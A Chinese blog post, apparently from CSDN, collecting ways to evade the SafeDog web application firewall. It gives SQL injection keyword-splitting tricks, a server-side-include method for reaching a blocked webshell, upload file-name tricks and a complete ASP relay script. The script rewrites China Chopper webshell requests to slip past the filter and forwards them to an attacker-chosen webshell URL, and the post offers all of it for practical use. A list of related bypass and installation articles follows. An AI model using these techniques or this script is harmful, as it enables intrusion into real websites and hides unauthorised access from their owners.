过安全狗技术总汇

最新推荐文章于 2024-01-24 09:04:12 发布
最新推荐文章于 2024-01-24 09:04:12 发布
阅读量795 收藏 1
点赞数
分类专栏: 漏洞收集 文章标签: 安全狗

作者鬼哥

1.过注入
2.过大马被阻拦访问
3.过菜刀连接一句话被拦截
4.过1.asp;.jpg这样的文件
其他我没遇到了。。

现在一点一点讲:
1.过注入
方法一:a.asp?aaa=%00&id=sql语句
方法二: a.asp?id=sql语句   里面把安全过滤的加个%l 比如: un%aion sel%aect 1,2,3,4 fr%aom admin

2.过大马被阻拦访问
方法一:上传一个大马 然后访问http://sss.com/dama.asp  访问后出现拦截。
那么解决方法 先将dama.asp改名dama.jpg上传,然后在同目录上传个文件da.asp 内容为: <!–#include file=”dama.jpg” –>  这样再访问da.asp  就不会被拦截了。

3.过菜刀连接一句话被拦截
方法一:不用菜刀连接一句话,用别的一句话连接端。
方法二:中转下连接菜刀,把过滤掉的词替换掉。

4.过1.asp;.jpg这样的文件拦截
方法一:;1.asp;.jpg
方法二:保密

具体就为大家总结这么多了,安全狗 反正基本可以无视了!!
大家还有什么要补充的可以发在下面!

下面这个脚本是过安全狗连接菜刀用的 用法: 先把这个脚本放到个可执行.asp的目录
然后访问http://www.xx.com/asf.asp?dz=你要过的那个webshell地址
然后把地址输入进菜刀 密码还是你要过的那个webshell的密码 类型也是选择那个一句话木马的后缀类型
例如:http://www.xx.com/asf.asp?dz=http://xxx.com/yijuhua.php 密码
这样输入就菜刀
这个脚本暂时支持.php .aspx的一句话连接  .asp的可能还不行 没测试过。如果谁有装了安全狗的webshell可以告诉我下。我再测试下把这个脚本修改全面都支持!

1 <%
2     '饶过的原理,抓菜刀连接webshell的包 然后研究安全狗过滤了哪些关键字 中转替换掉那些过滤的关键字 就成!
3     JmStr=Replace(Request.Form,"$_POST","$_REQUEST")
4     JmStr=Replace(JmStr,"->|","-->|")
5     JmStr=Replace(JmStr,"@eval(","@eval   (")
6     JmStr=Replace(JmStr,"System.Convert.FromBase64String","System.Convert. FromBase64String")
7     JMUrl=request("dz")
8     response.write  request("dz")
9     JmRef=JMUrl
10     JmCok=""
11     response.write  PostData(JMUrl,JmStr,JmCok,JmRef)
12     Function PostData(PostUrl,PostStr,PostCok,PostRef)
13     Dim Http
14     Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
15     With Http
16     .Open "POST",PostUrl,False
17     .SetRequestHeader "Content-Length",Len(PostStr)
18     .SetRequestHeader "Content-Type","application/x-www-form-urlencoded"
19     .SetRequestHeader "Referer",PostRef
20     '.SetRequestHeader "Cookie",PostCok
21     .Send PostStr
22     PostData = .ResponseBody
23     End With
24     Set Http = Nothing
25     PostData =bytes2BSTR(PostData)
26     End Function
27  
28     Function bytes2BSTR(vIn)
29     Dim strReturn
30     Dim I, ThisCharCode, NextCharCode
31     strReturn = ""
32     For I = 1 To LenB(vIn)
33     ThisCharCode = AscB(MidB(vIn, I, 1))
34     If ThisCharCode < &H80 Then
35     strReturn = strReturn & Chr(ThisCharCode)
36     Else
37     NextCharCode = AscB(MidB(vIn, I + 1, 1))
38     strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
39     I = I + 1
40     End If
41     Next
42     bytes2BSTR = strReturn
43     End Function
44  
45     Function URLEncoding(vstrin)
46     strReturn=""
47     Dim i
48     For i=1 To Len(vstrin)
49     ThisChr=Mid(vstrin,i,1)
50     if Abs(Asc(ThisChr))< &HFF Then
51     strReturn=strReturn & ThisChr
52     Else
53     InnerCode=Asc(ThisChr)
54     If InnerCode<0 Then
55     InnerCode=InnerCode + &H10000
56     End If
57     Hight1=(InnerCode And &HFF00) \&HFF
58     Low1=InnerCode And &HFF
59     strReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1)
60     End if
61     Next
62     strReturn=Replace(strReturn,chr(32),"%20") '转换空格,如果网站过滤了空格,尝试用/**/来代替%20
63     strReturn=Replace(strReturn,chr(43),"%2B")  'J6156增加转换+字符
64     'strReturn=Replace(strReturn,过滤字符,"转换为字符")  '在此增加要过滤的代码
65     URLEncoding=strReturn
66     End Function
67  
68     %>
7禧
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
可以删除服务、查看木马服务的必备软件-Windows系统服务优化终结者v3.3
10-28
如果你想: 1,让某一程序以服务运行 2,删除服务 3.查看不明服务,如木马服务 等等 。。。。。。 你可以利用Windows系统服务优化终结者v3,3,我也在用,电脑高手必备软件。
WAF相关知识及安全狗的部署和绕过
北冥同学的成长记录笔记
07-16 3536
WAF即Web应用程序防火墙通过过滤和监视Web应用程序与Internet之间的HTTP通信来帮助保护Web应用程序,Web Application Firewall (WEB 应用防护系统)。
解决安全狗安装后显示apache插件未安装,无法使用的问题。
Wwwwwwhyyyy的博客
12-07 780
我在卸载了安全狗后,我的本机电脑就无法安装安全狗了,在安装界面显示了无法检测到apache坏境之后,就会自动关闭,但是打开了apache服务之后,连提示都不给,直接自动关闭,所以导致我又重新安装了一个win镜像。为了确保不会遇到像我一样的问题,还是使用文件夹自带的安全狗卸载。4.打开任务管理器,选择服务页面,然后右键apache,启动apache就行了。6.弹出安装程序,自动填写了服务名,直接点击确定,开始安装。5.右键下方的安全狗图标,点击未安装,进行安装。软件直接在安全狗的官网下载就行了。
安全狗】linux免费服务器防护软件安全狗详细安装教程
最新发布
dzqxwzoe的博客
01-24 2383
在费用有限的基础上,复杂密码+云服务器基础防护+常见端口替换+安全软件,可以防护绝大多数攻击。
安全狗的绕过
alien0011的博客
06-09 3454
安全狗的绕过(截至6.8号) 环境: phpstudy2018 安全狗apache版 sqllabs靶场 安全狗绕过思路: 安全狗是基于正则匹配的绕过,所以总是能够绕过其正则匹配实现sql的命令执行,需要对数据库语句灵活掌握。经过对安全狗的fuzz,测试其拦截规则,发现其实and、or这样的敏感字符是不会被直接拦截的,但是and加空格就会被拦截,其实绕过的中心可以向如何绕过空格偏移。 为了可以更清晰的认知注入语句是如何在数据库中执行的,我修改了sqli-lab的代...
应用网络技术实现煤矿安全监测系统联网.docx
10-02
本文介绍了如何应用网络技术实现煤矿安全监测系统的联网,以提高煤矿安全生产的管理水平。大同煤矿集团公司通过联网技术成功解决了不同监测系统之间的兼容性问题,实现了监测数据的自动采集和远程传输,有效增强了...
目前认为总结的最全的ET加密狗升级id汇总(含之前及部分最新的定额id)
06-14
为了有效利用这个汇总文件,用户需要了解基本的许可证管理知识,如许可证密钥的结构、如何激活和验证许可证,以及如何在组织内安全地存储和分发这些敏感信息。同时,熟悉相关的软件工具和技术,如许可证服务器管理...
宏业清单计价2009 复制狗
03-08
【标题】"宏业清单计价2009 复制狗"指的是宏业软件公司于2009年推出的清单计价软件——宏业清单计价2009版本,其中“复制狗”通常是指该软件的授权复制保护设备,如USB加密狗。这种设备用于防止未经授权的复制和非法...
2021网络安全知识竞赛题库及答案.docx
06-07
下列不属于系统安全的技术是(B) A、防火墙 B、加密狗 C、认证 D、防病毒 A、不用生日做密码 2021网络安全知识竞赛题库及答案全文共9页,当前为第2页。 B、不要使用少于5位的密码 2021网络安全知识竞赛题库及答案...
腾讯、百度、华为、搜狗和滴滴Android面试题汇总
01-20
【Android基础】 在Android开发中,基础扎实是面试的关键。...同时,保持对业界动态的关注,熟悉前沿技术如RN、Weex、H5、小程序,以及具备跨领域的技术理解,如JavaScript等,也是现代Android开发者所需具备的能力。
SQL注入绕过安全狗的五种方法
01-11 1336
2,输入 1’ or 1 and 1 --+ (意思是闭合参数tel的单引号,or 1 and 1 让条件结果为真,无论1是否存在都会返回数据,–+ 闭合后面的其他语句)回显页面正常。有我们必火的小女生好看吗?–:表示注释,在mysql中真正的注释是"-- ",这里必须有个空格,否则不是注释,%0a是换行的url编码,换号后,表示重新查询,前面的注释对后面的语句将不再影响,这也要注意,这里红色框处,当url参数出现两个同名参数时,将取最后一个参数的值,所以这里会取后面的tel的值,前面传参/
SQL注入-绕过安全狗
LJH1999ZN的博客
02-15 5050
绕过安全狗的常见四种方式 id=1'/*!44444order*/ /*!44444by*/3--+
安全狗安装
遇事不决冲冲冲
05-25 8507
一.前言 二.下载安装环境部署 专门把下载安装环境部署放到这里讲一下,因为我当时被困扰了一个多少小时,网上查了好多,也问了网上一些人,最后最后才找到一篇能解决的,不问不知道,被安装部署困扰到的人还真不少,这里我把我安装过程中踩到的坑都写出来,再附上正确安装步骤。 1.下载 这里我就直接贴上下载地址,当时我是搜的网站安全狗 进去以后指一下免费下载,然后点击 2.服务名 我觉得这里就算是一个小坑了,我也是卡在这里好长时间,打开看见一个服务名,不知道该写啥,贴一个环境配置视频吧,这上面说用的是phpstud
文件上传绕过安全狗的一些方法
sGanYu
04-28 3793
目录 安全狗的安装 垃圾数据绕过: 数据包溢出绕过: 值匹配""的内容,后跟.php: 多个filename,绕过匹配: 白名单绕过: 测试工具:Burpsuite,安全狗 测试网站: 在没有安全狗的情况下,上传1.Php,以文件大小写后缀上传,是不会被拦截的,如下图 安全狗的安装 安全狗地址:网站安全狗-网站安全防护,防后门|防SQL注入|防CC攻击|网马查杀|防篡改,选择windows操作系统,Apache版本选择4.0,一直默认安装即可 在默认安装时,会跳出需要填写关于Ap
Bypass安全狗
sun_k的博客
09-08 600
0x00 手工fuzz绕过安全狗 环境 安全狗最新ApacheV4.0版(Windows) Sqli-lab-Less-1 Phpstudy集成环境:Apache2.4.39、Mysql5.5.29 Sqli-lab-Less-1中包含了联合查询、报错注入、布尔盲注、时间延时盲注等注入姿势,方便我们进行测试。 1、fuzz安全狗拦截策略 http://192.168.174.136/sqli-labs-master/sqli-labs-master/Less-1/?id=1' 报错且不拦截 http
绕过安全狗
weixin_45923850的博客
07-20 1098
1. 判断类型:?id=1正常,?id=1 and 0被拦截,经过变形and和后面值发现这个组合会被拦截,用非常规方式绕过,例?id=1 and -1=-2和?id=1 and -1=-1,虽然绕过了,但是页面没变化,所以可能是字符型,加单引号就正常,?id=1' and -1=-1 --+ 2. 判断列数:输入?id=1' order by 3 --+被拦截,用注释,?id=1' /*!23144 order==*/ /*!32443 by*/ 3 --+页面正常,绕狗成功 3.
Centos7安装安全狗
PolarPeak的博客
12-08 922
下载安装包 wget http://down.safedog.cn/safedog_linux64.tar.gz 解压 tar xzvf safedog_linux64.tar.gz cd safedog_an_linux64_2.8.21207/ 给安装文件足够权限 chmod +x install.py 开始安装 ./install.py 报错 翻译一下,需要禁用selinux vim /etc/selinux/config SELINUX=disabled.
安全狗入选Gartner云安全&安全运营中国市场供应商双名单
bocco的博客
03-16 3579
近期,国际权威咨询机构Gartner基于市场研究和对中国安全产品供应商的调查做了评估并发布《Toolkit:Vendor Identification for Cloud Security, Data Security, IAM and Security Operation in China》。
突破安全狗
duan_qiao925的博客
06-05 805
实验准备 Sql注入原理:用户能控制输入并构造恶意参数(多为sql语句),Web应用执行的代码拼接了未加过滤的nei'rong。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值